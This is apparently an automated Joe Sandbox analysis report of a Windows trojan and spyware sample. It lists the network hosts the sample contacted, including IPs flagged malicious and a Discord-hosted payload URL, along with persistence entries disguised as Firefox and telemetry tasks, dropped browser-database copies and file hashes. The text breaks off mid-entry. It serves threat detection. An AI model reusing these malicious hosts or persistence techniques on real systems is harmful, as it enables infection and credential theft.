http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | CD17.exe.10.dr | false | URL Reputation: safe | unknown
https://cdn.discordapp.com/attachments/893177342426509335/903580019203387432/930B55FC.jpg | DEDC.exe.10.dr | false | | high
https://clients2.googleusercontent.com | f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr | false | | high
https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external | Reporting and NEL.36.dr | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr | false | | high
https://www.google.com/ | manifest.json.34.dr | false | | high
https://clients2.google.com/service/update2/crx | manifest.json.34.dr | false | | high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr | false | | high

                                                                                                                                                Contacted IPs


                                                                                                                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
142.250.203.110 | clients.l.google.com | United States | 15169 | GOOGLEUS | false
194.180.174.181 | unknown | unknown | 39798 | MIVOCLOUDMD | true
162.159.135.233 | unknown | United States | 13335 | CLOUDFLARENETUS | false
172.217.168.45 | accounts.google.com | United States | 15169 | GOOGLEUS | false
162.159.130.233 | unknown | United States | 13335 | CLOUDFLARENETUS | false
142.250.203.97 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false
185.199.109.133 | avatars.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
162.159.134.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
81.177.141.36 | iyc.jelikob.ru | Russian Federation | 8342 | RTCOMM-ASRU | false
172.67.160.46 | toptelete.top | United States | 13335 | CLOUDFLARENETUS | false
211.59.14.90 | znpst.top | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | false
140.82.121.4 | github.com | United States | 36459 | GITHUBUS | false
216.128.137.31 | unknown | United States | 20473 | AS-CHOOPAUS | true
93.115.20.139 | unknown | Romania | 202448 | MVPShttpswwwmvpsnetEU | false
45.141.84.21 | nusurtal4f.net | Russian Federation | 206728 | MEDIALAND-ASRU | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
5.188.88.203 | privacytoolzforyou-6000.top | Russian Federation | 34665 | PINDC-ASRU | false

                                                                                                                                                Private

                                                                                                                                                IP
                                                                                                                                                192.168.2.1
                                                                                                                                                192.168.2.3
                                                                                                                                                127.0.0.1

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                Analysis ID:511702
                                                                                                                                                Start date:29.10.2021
                                                                                                                                                Start time:14:08:08
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 14m 18s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:light
                                                                                                                                                Sample file name:Md0q201V1D.exe
                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Number of analysed new started processes analysed:46
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@74/167@62/20
EGA Information: Failed
HDC Information:
• Successful, ratio: 51.1% (good quality ratio 29.2%)
• Quality average: 29%
• Quality standard deviation: 30.2%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• TCP Packets have been reduced to 100
• Created / dropped Files have been reduced to 100
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.82.210.154, 20.54.110.249, 173.222.108.210, 173.222.108.226, 40.112.88.60, 80.67.82.235, 80.67.82.211, 172.217.168.14, 23.203.70.208, 23.36.225.185, 172.217.168.67, 173.194.182.201, 173.194.182.73, 13.107.246.60, 13.107.213.60, 142.250.203.106, 52.178.17.2, 20.189.173.21, 142.250.203.99
• Excluded domains from analysis (whitelisted): aijscdn2.afd.azureedge.net, onedscolprdweu02.westeurope.cloudapp.azure.com, clientservices.googleapis.com, browser.events.data.trafficmanager.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, r4.sn-4g5e6ns7.gvt1.com, e11290.dspg.akamaiedge.net, update.googleapis.com, watson.telemetry.microsoft.com, www.gstatic.com, fs.microsoft.com, content-autofill.googleapis.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, part-0032.t-0009.t-msedge.net, ris.api.iris.microsoft.com, r4.sn-4g5e6nss.gvt1.com, blobcollector.events.data.trafficmanager.net, dual.part-0032.t-0009.t-msedge.net, r4---sn-4g5e6nss.gvt1.com, docs.microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, redirector.gvt1.com, onedsblobprdwus16.westus.cloudapp.azure.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, docs.microsoft.com-c.edgekey.net.globalredir.akadns.net, r4---sn-4g5e6ns7.gvt1.com, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, e13630.dscb.akamaiedge.net, firstparty-azurefd-prod.trafficmanager.net, download.windowsupdate.com.edgesuite.net, aijscdn2.azureedge.net, browser.events.data.microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, docs.microsoft.com, wcpstatic.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing network information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time     | Type            | Description
14:09:40 | Task Scheduler  | Run new task: Firefox Default Browser Agent BF8D87ED27EA04ED path: C:\Users\user\AppData\Roaming\gbhudtb
14:10:34 | API Interceptor | 7x Sleep call for process: C066.exe modified
14:10:57 | Task Scheduler  | Run new task: Firefox Default Browser Agent A4EC042678D4669E path: C:\Users\user\AppData\Roaming\bhhudtb
14:11:02 | Task Scheduler  | Run new task: Firefox Default Browser Agent 621E197CCCA21806 path: C:\Users\user\AppData\Roaming\fehudtb
14:11:14 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\1ba0d279-1ad8-451e-a70f-de201594af59\C295.exe" --AutoStart
14:11:26 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\1ba0d279-1ad8-451e-a70f-de201594af59\C295.exe" --AutoStart
14:11:27 | Task Scheduler  | Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\1ba0d279-1ad8-451e-a70f-de201594af59\C295.exe s>--Task
14:11:40 | Task Scheduler  | Run new task: Telemetry Logging path: C:\Users\user\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\1xVPfvJcrg
Process: C:\Users\user\AppData\Local\Temp\C066.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
Reputation: unknown
C:\Users\user\AppData\LocalLow\AQNoUsTOxr
Process: C:\Users\user\AppData\Local\Temp\C066.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 118784
Entropy (8bit): 0.7814144457324289
Encrypted: false
SSDEEP: 96:dIQLKnlxKp2LK3IQkKylSK62kK0L62y7z3qU+bDoYysX0uhnydVjN9DLjGQLBE3M:962I+bDo3irhnydVj3XBBE3ud
MD5: D9EB8022FD3B8EE752008BD119F0FBBB
SHA1: 32B613EFA72902BFB39EA6FF27B0E9F8D3985A33
SHA-256: 69858096A6332A75B2B491B0AB2DFD8359123FB17B794DD7BA84373DC34B1484
SHA-512: 87C58557D1D8E3DAA6053C5D4C7210378ADA090BA3EB22FE5306DFC234A98AB86EF7E212696CA6576072E535ECE3D6F1C44750843B555D773EBA4E29A1B619B7
Malicious: false
Reputation: unknown
C:\Users\user\AppData\LocalLow\RYwTiizs2t
Process: C:\Users\user\AppData\Local\Temp\C066.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 73728
Entropy (8bit): 1.1874185457069584
Encrypted: false
SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5: 72A43D390E478BA9664F03951692D109
SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious: false
Reputation: unknown
C:\Users\user\AppData\LocalLow\chrome_urls.txt
Process: C:\Users\user\AppData\Local\Temp\C066.exe
File Type: ASCII text, with CRLF, CR line terminators
Category: dropped
Size (bytes): 1429
Entropy (8bit): 5.274877286745222
Encrypted: false
SSDEEP: 24:MZTRbQJwlnu4EIfoMmQJwlnu4EjH9oMmQJwlnu4GTRbQJwlWu4gIfoMmQJwlWu4W:AlpMIQPM2P+lp9IQP92PE
MD5: 4347CC65785803494752CF2338D19AAB
SHA1: B68A8009D28D1BC48DA8964FFC446696964058E9
SHA-256: B217C805BAF5AA4D69E3BC4A51859827E613253E7B55CBCD3B07560D5C2115FA
SHA-512: FDB0D5A4151C4C26B7E8BEC6A35A16DFAED941C5D3072D830A925EB83DBE731811F8C259BB36284FEC8BD86202DA5BB4E5E681F1819486FECCE7CDC2EF119760
Malicious: false
Reputation: unknown
Preview (line terminators rendered as line breaks):
URL: http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Count: 2
Last visit: 2021-10-29 21:10:29

URL: https://docs.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Count: 2
Last visit: 2021-10-29 21:10:29

URL: https://docs.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Count: 2
Last visit: 2021-10-29 21:10:29

URL: http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Count: 2
Last visit: 2021-10-29 21:10:50

URL: https://docs.microsoft.com/dot
C:\Users\user\AppData\LocalLow\fPT59QhKSGE.zip
Process: C:\Users\user\AppData\Local\Temp\C066.exe
File Type: Zip archive data, at least v2.0 to extract
Category: dropped
Size (bytes): 1841
Entropy (8bit): 7.634695689852965
Encrypted: false
SSDEEP: 24:9jTO6RC/Ep21CPXRsy8zeRiByTkmKdLzGDz7ytNvN2bEVm3jWzuq1OSdFN5y6v88:9NCsMUXR1niBjjmP62QdzuKOW5y6F
MD5: 2C527C1F4D30880EA86DDE4C0CC1CD23
SHA1: 01FDEBB33BB4E6234DC360A7C895B8DD4AC6EB8F
SHA-256: C5F7E2C50ADD5B0D058EF07659A7E437B73516D652B7927B2698B64B5C3412B2
SHA-512: 58A4EB7CB8E5B2F2C4BEEE3A2FCF16D5B30B83097638D914B43C422D975F78EAEFD08C9ACE05D65106BED87042AB7F08AC301DCA501DB700580EA971E8C761F1
Malicious: false
Reputation: unknown
C:\Users\user\AppData\LocalLow\frAQBc8Wsa
Process: C:\Users\user\AppData\Local\Temp\C066.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.792852251086831
Encrypted: false
SSDEEP: 48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5: 81DB1710BB13DA3343FC0DF9F00BE49F
SHA1: 9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256: 9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512: CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious: false
Reputation: unknown
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\LocalLow\rQF69AzBla
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C066.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20480
                                                                                                                                                Entropy (8bit):1.4334508710755112
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:dNwf2WtfkjzS8NhV2Q0Ch32uwnnihkKLdH2Qf2:du5wEkhGhBH
                                                                                                                                                MD5:4A5E8FB665F7F9C276B38C5CFBD15D10
                                                                                                                                                SHA1:A0DF8F94A3A67B03A569A25A0658104A7915E029
                                                                                                                                                SHA-256:E095AE577F462636A5DB3107A1033540E1695071DCC03405422651D391339AA8
                                                                                                                                                SHA-512:492F3F1350E5F52CC80D62CD26EEE984E6C98444F55CDF75824263CA19EA9FF0834D74394104D655F209DFF88FB49B74BDE3C941978E88AC2A4644498AC14250
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\LocalLow\sqlite3.dll
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C066.exe
                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):916735
                                                                                                                                                Entropy (8bit):6.514932604208782
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
                                                                                                                                                MD5:F964811B68F9F1487C2B41E1AEF576CE
                                                                                                                                                SHA1:B423959793F14B1416BC3B7051BED58A1034025F
                                                                                                                                                SHA-256:83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
                                                                                                                                                SHA-512:565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                 • Antivirus: Metadefender, Detection: 0%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\13c08b90-0c19-4b85-83da-a9c4dd83285c.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):96740
                                                                                                                                                Entropy (8bit):3.75005252311946
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:2K34dqKZGMX8OPsvvV4+lENtrevx73CV7+Hv6GOxrcfVhxCrD/SrApm4zcb1FlSg:5346K+59CX+Oge7tD3Q3rG/KxPNTr
                                                                                                                                                MD5:795ADA0AD7DFBD414E443CC12889C188
                                                                                                                                                SHA1:C5682B9CBEB5489E2B8DA1C0BDD0264CB90880B9
                                                                                                                                                SHA-256:2FC2EECBF22C8AA6A370CBF0884B1C8627C9A2BEE6AC59FC769DE7E1FA95BB87
                                                                                                                                                SHA-512:ABE86A19820206AD6431C0758A59C578C5A859FD32AAE0751E5CBD2EFD73CE7AA9D0B6A7156FA0E15568F91C0EC8CE9DECA28B109FFF9B5E415B21D0248D8B0B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: .y..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....I8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\17b6b034-6ccd-4bbe-8ead-8ffd7655270a.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185224
                                                                                                                                                Entropy (8bit):6.0767786021951835
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:h8PLD8n55EtvVAkRNGWr9x39UfkT7RdOAD+FcbXafIB0u1GOJmA3iuRw:aPLD8Qtdf0S39U6TlUaqfIlUOoSiuRw
                                                                                                                                                MD5:FB20DB9CC2ECCF503196D173C40E506F
                                                                                                                                                SHA1:31D0BFFF97A8EAD257DAC75A19334A4269CC18EA
                                                                                                                                                SHA-256:41A240AD71C126200141586D587A7C211542BDD575B038DA91B7DC1AC5C37250
                                                                                                                                                SHA-512:CE04CF7A66FF3F14C76A76C530E66903DCAB52962979A66B2D280DD19072530282CA9F23B922DB6367D733A4A09583138B24A52F4E97320A55F027E9D543A6D4
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\3366f6f8-0dc7-4d25-b0cb-16ae790a8a61.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:SysEx File -
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):94708
                                                                                                                                                Entropy (8bit):3.7494983911950053
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:lK34dqZpX8OPsvvV4+lENtrevx73CV7+Hv6GOxrcfVhxCrD/SrApm4zcb1FlSO/h:k34ZK+59CX+Oge7tD3Q3rG/KxPNBd
                                                                                                                                                MD5:F24E50A646EF83AE65C4D3C84057E0E1
                                                                                                                                                SHA1:D0BC925FF3DCA80A088D30368CE65F90469FB451
                                                                                                                                                SHA-256:93DDEBD8F5655128F26C795AC39A3E6F1BED3A9C18A3CCED0CB758F27532BDA7
                                                                                                                                                SHA-512:D07C49BFB8036241196E30EC65130BD898F1D19F2B1DF28EFE26A49A0447DBD4787BBFE57EEB3B7A7FDFE440A535E4347323B0A29B201568DDCEF38787861E90
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: .q..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....I8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\3867d940-4f91-4cd9-bedf-1b681a77be65.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):87023
                                                                                                                                                Entropy (8bit):6.102321908149239
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:SUuGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SUuFcbXafIB0u1GOJmA3iuR+
                                                                                                                                                MD5:04EA3ECF47F46C9AB073A1A8CAE1617E
                                                                                                                                                SHA1:062C6F716D0EE3126EB4C687FCA4F403DF7657B9
                                                                                                                                                SHA-256:53BC3171C0A8431E431E2DF17F7001AFD829930A31766D8898A81846A2992FA3
                                                                                                                                                SHA-512:84DBBDA70C2148B1FEDB2019519D5FF3BA18F4DB3CB7F218F0B9A140B86073C17BB303658132AEB6331682A48B887005C9C78B47755D5707A243465E8C8CC7E5
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"displayurl":true,"group_name_matcher":"*Shockwave Flash*","help_url":"https://support.google.com/chrome/?p=plugin_flash","lang":"en-US","mime_type
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\5298aac8-1da2-471d-8294-5dab686fcd20.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):176739
                                                                                                                                                Entropy (8bit):6.047238136544904
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:nLD8n55EtvVAkRNGWr9x39UfkT7RdOAD+FcbXafIB0u1GOJmA3iuRw:nLD8Qtdf0S39U6TlUaqfIlUOoSiuRw
                                                                                                                                                MD5:0A420CBFE79BE2CEAEAF4E46E41FE083
                                                                                                                                                SHA1:1B8E2EC3BDD26F1FC6D885F6477EE3970F4DE337
